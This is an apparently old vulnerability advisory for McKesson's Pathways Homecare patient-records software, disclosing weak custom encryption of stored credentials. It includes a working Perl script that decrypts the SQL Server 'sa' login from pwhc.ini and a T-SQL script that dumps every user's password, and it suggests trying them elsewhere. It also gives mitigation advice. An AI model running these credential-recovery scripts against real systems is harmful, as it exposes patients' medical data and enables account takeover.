Platforms: Windows 95 Windows 98 Windows ME Windows 2000 Application: Pathways Homecare 6.5 What's the big deal? Users with access to certain config files can retrieve 'sa' or equivalent account password for SQL Server 7.0 (MSDE) as well as retrieve application passwords for all users of the application. The full scoop: According to the vendor, McKesson's Pathways Homecare is the first comprehensive client/server application introduced to the homecare market for advanced information management. Basically is stores patient information, billing information and medical records for people who recieve health care in their homes. Each clinician has a laptop and all the laptops are periodically synced with a central database. Additionally there is a desktop client for administrative staff. Both the laptops and the central database server run Microsoft SQL Server 7.0. Workstation and laptop users alike get their connection information from a file named pwhc.ini which contains an encrypted username and password. For workstations, the file is stored on a central fileserver and the account is likely to have dbo level permissions on the central database. For the laptops, this file is stored locally and the account used is either 'sa' on the local version of SQL or has equivalent permissions. As you've probably guessed by now, the vendor (on the web at ) decided to be clever and roll their own encryption algorithm: First they determine whether the username/password is even or odd in length. If odd, they use the following sequence of numbers: 3,8,5,10,7... If even, the sequence is 7,4,9,6,11... Then they reverse the username/password and subtract the corresponding number in the sequence from each byte. That wasn't the best of explanations, so here's a bit of perl: #! /usr/bin/perl -w ################################################################################ # -- Extracts a password from a Pathways Homecare PWHC.ini file ################################################################################ use strict; open (PWHC, "pwhc.ini") or die "Unable to open .ini file"; while (<PWHC>) { chomp; if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; } if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; } } ################################################################################ # The sad thing is that this isn't the worst part of product. It's not # that the vendor is using weak encryption, it's that the quality of # the encryption is better than most of their code. ################################################################################ sub decrypt { my $counter = 0; my $key; my @cryptstr = split /=/, $_, 2; my @revstr = unpack("c*", (scalar reverse $cryptstr[1])); if(@revstr % 2) { $key = 3; while ($counter < @revstr) { $revstr[$counter] += $key; $counter++; $key += ($counter % 2) ? 5 : -3; } } else { $key = 7; while ($counter < @revstr) { $revstr[$counter] += $key; $counter++; $key += ($counter % 2) ? -3 : 5; } } return pack("c*", (reverse @revstr)); } __END__ So now anyone who can get access to the config files for Pathways Homecare can read and modify confidential patient information as well as enjoy sa priviliges on laptop clients, but they still can't use McKesson's usability disaster of a VB client to access that data in a less inconvienent manner because it's protected by an an additional level of password protection. Unfortunately the vendor uses the exact same encryption method with slightly different key sequences for this additional layer of security. It's possible to retrieve the username and password for every user in about 2 seconds. The T-SQL code to do this follows: SET NOCOUNT ON DECLARE @evenkey varchar(15) DECLARE @oddkey varchar(15) DECLARE @key varchar(15) DECLARE @cryptstr varchar(15) DECLARE @position tinyint DECLARE @length tinyint DECLARE @usrid varchar(30) DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr OPEN pwd_cursor FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr SET @evenkey = 'FDHFJHLJNLPNRP' SET @oddkey = 'CGEIGKIMKOMQOSQ' WHILE (@@FETCH_STATUS = 0) BEGIN SET @position = 1 SET @length = datalength(@cryptstr) IF ((@length % 2) = 1) SET @key = @oddkey ELSE SET @key = @evenkey WHILE (@position <= @length) BEGIN SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1, CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65) + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1)))) SET @position = @position + 1 END PRINT @usrID + ' : ' + @cryptstr FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr END DEALLOCATE pwd_cursor GO Bang! Out come the passwords and it's time to see if the user uses the same password elsewhere. I contacted the 2 weeks ago. I recieved an immediate response telling me that my message had been forwarded to the appropriate parties within the Pathways Homecare product group and that was the last of it. Anyway, the best way to mitigate the security vulnerabilities disclosed here is to not use the product. Failing that, you should use integrated security to connect to SQL Server (meaning you can't run Windows 9x/ME on the laptops, but you shouldn't be doing that anyway). --Shoeboy Software is like sex, it's better when RMS isn't involved.